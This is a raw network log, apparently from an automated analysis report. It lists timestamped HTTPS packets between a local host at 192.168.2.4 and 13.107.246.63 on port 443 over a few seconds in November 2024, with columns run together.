                                                                                                                                                                                                            Nov 22, 2024 04:27:21.737148046 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.737255096 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.737458944 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.737482071 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.737494946 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.737499952 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.740075111 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.740125895 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.740212917 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.740485907 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.740504980 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.741172075 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.744592905 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.744626999 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.745031118 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.745038986 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.881859064 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.882344961 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.882364035 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.882636070 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.882863045 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.882870913 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.882951975 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.882980108 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.883351088 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:21.883358002 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.138189077 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.138258934 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.138381958 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.138536930 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.138551950 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.138562918 CET49897443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.138567924 CET4434989713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.141568899 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.141630888 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.141725063 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.141864061 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.141884089 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.176764965 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.176829100 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.176925898 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.177109003 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.177109003 CET49900443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.177161932 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.177190065 CET4434990013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.179578066 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.179622889 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.179702044 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.179848909 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.179864883 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.335174084 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.335246086 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.335328102 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.335728884 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.335813999 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.336278915 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.337748051 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.337748051 CET49899443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.337763071 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.337770939 CET4434989913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.338830948 CET49898443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.338855982 CET4434989813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.348644018 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.348664999 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.348757982 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.350195885 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.350241899 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.350321054 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.350572109 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.350583076 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.350770950 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:22.350788116 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.534254074 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.534740925 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.534760952 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.535317898 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.535322905 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.978018999 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.978101015 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.978296041 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.978410006 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.978410006 CET49901443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.978461981 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.978496075 CET4434990113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.980412006 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.981596947 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.981628895 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.981909990 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.981956959 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.982017994 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.982122898 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.982136965 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.982148886 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:23.982161045 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.008047104 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.008912086 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.008970976 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.009325981 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.009344101 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.153249979 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.153672934 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.153685093 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.154134035 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.154138088 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.217879057 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.218395948 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.218413115 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.218866110 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.218872070 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.423439980 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.423506021 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.423597097 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.423858881 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.423902988 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.423933029 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.423950911 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.426333904 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.426386118 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.426476955 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.426644087 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.426659107 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.462387085 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.462466955 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.462531090 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.462682962 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.462699890 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.462709904 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.462716103 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.465806961 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.465869904 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.465954065 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.466113091 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.466145992 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.599478006 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.599556923 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.599663973 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.599919081 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.599919081 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.599936962 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.599946022 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.602868080 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.602914095 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.602991104 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.603146076 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.603162050 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.670444965 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.670526028 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.670591116 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.670814991 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.670836926 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.670850039 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.670857906 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.673404932 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.673446894 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.673527002 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.673652887 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:24.673670053 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:25.762109041 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:25.769699097 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:25.769722939 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:25.770771027 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:25.770776987 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.156980991 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.157726049 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.157754898 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.158217907 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.158224106 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.206562996 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.206669092 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.206727982 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.207003117 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.207003117 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.207015991 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.207024097 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.209548950 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.209592104 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.209666967 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.209826946 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.209841967 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.318428993 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.318826914 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.319056988 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.319086075 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.319133997 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.319221020 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.319468975 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.319477081 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.319566011 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.319581032 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.451263905 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.451740026 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.451766014 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.452264071 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.452275038 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.592722893 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.592772961 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.592823029 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.593038082 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.593056917 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.593065977 CET49907443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.593071938 CET4434990713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.596081018 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.596113920 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.596235037 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.596369028 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.596383095 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.752757072 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.752830029 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.753041029 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.753151894 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.753169060 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.753179073 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.753184080 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.756259918 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.756309032 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.756479025 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.756577969 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.756597042 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.771038055 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.771186113 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.771260023 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.771358967 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.771358967 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.771404028 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.771431923 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.774035931 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.774055004 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.774136066 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.774327040 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.774338007 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.894241095 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.894434929 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.894500017 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.894578934 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.894579887 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.894625902 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.894686937 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.897486925 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.897522926 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.897654057 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.897829056 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:26.897841930 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:27.929876089 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:27.930454016 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:27.930486917 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:27.930927038 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:27.930931091 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.364027977 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.364125013 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.364187956 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.367399931 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.367420912 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.367430925 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.367436886 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.378914118 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.410021067 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.410042048 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.413912058 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.413918018 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.432235956 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.432286978 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.432360888 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.434789896 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.434809923 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.470156908 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.479336023 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.479357958 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.482687950 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.482696056 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.496542931 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.497054100 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.497076988 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.497488022 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.497493029 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.756484032 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.757098913 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.757118940 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.757575035 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.757580042 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.822046995 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.822119951 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.822247028 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.822379112 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.822392941 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:28.822415113 CET49912443192.168.2.413.107.246.63
